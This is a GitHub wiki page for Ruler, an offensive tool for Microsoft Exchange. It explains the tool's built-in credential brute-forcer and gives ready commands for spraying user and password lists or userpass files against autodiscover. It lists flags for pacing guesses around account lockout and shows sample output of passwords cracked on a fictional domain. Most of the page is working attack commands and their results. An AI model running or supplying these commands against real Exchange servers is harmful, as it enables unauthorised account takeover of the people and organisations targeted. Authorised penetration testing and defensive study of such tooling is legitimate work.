-
Notifications
You must be signed in to change notification settings - Fork 361
Brute Force
While Ruler makes a best effort to "autodiscover" the necessary settings, you may still run into instances of it failing. The common causes are:
- autodiscover deployed over http and not https (we default to https as this is more common)
- No autodiscover DNS record
- Authentication failing
If you encounter an Exchange server where the Autodiscover service is failing, you can manually specify the Autodiscover URL:
./ruler --url http://autodiscover.somedomain.com/autodiscover/autodiscover.xml
If you run into issues with Authentication (and you know the creds are correct), you can try and force the use of basic authentication with the global --basic
The global --verbose flag will also give you some insight into the process being used by the autodiscover service.
Another interesting thing to note, is that Ruler doesn't require the --domain for authentication or autodiscover in most cases. The autodiscover service works off the email addresses domain. If you find that authentication is failing, it might mean that you require the internal domain name as part of the authentication string. For this, you will need to add --domain DOMAIN to your requests. This will ensure that NTLM auth does DOMAIN\USERNAME in the authentication sequence, instead of .\USERNAME.
Basic rule, use --domain with bruteforce (it uses this to figure out the autodiscover URL), otherwise leave it off.
If you go the brute-force route, Ruler is your friend. It has a built-in brute-forcer which does a semi-decent job of finding creds.
./ruler --domain targetdomain.com brute --users /path/to/user.txt --passwords /path/to/passwords.txt
You should see your brute-force in action:
./ruler --domain evilcorp.ninja --insecure brute --users ~/users.txt --passwords ~/passwords.txt --delay 0 --verbose
[*] Starting bruteforce
[x] Failed: cindy.baker:P@ssw0rd
[x] Failed: henry.hammond:P@ssw0rd
[x] Failed: john.ford:P@ssw0rd
[x] Failed: cindy.baker:August2016
[x] Failed: henry.hammond:August2016
[+] Success: john.ford:August2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: cindy.baker:Evilcorp@2016
[x] Failed: henry.hammond:Evilcorp@2016
[x] Failed: cindy.baker:3V1lc0rp
[x] Failed: henry.hammond:3V1lc0rp
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: henry.hammond:Password1
[+] Success: cindy.baker:Password1
Alternatively, you can specify a userpass file with the --userpass option. The userpass file should be colon-delimited with one pair of credentials per line:
$ cat userpass.txt
john.ford:August2016
henry.hammond:Password!2016
cindy.baker:Password1
./ruler --domain evilcorp.ninja --insecure brute --userpass userpass.txt -v
[*] Starting bruteforce
[+] Success: john.ford:August2016
[x] Failed: henry.hammond:Password!2016
[+] Success: cindy.baker:Password1
There are a few other flags that work with brute
These are:
- --stop //stop on the first valid username:password combo
- --delay //how long to wait between multiple password guesses
- --attempts //how many attempts before we delay (attempts per user)
- --insecure //if the Exchange server has a bad SSL cerificate
- --verbose //be verbose and show failed attempts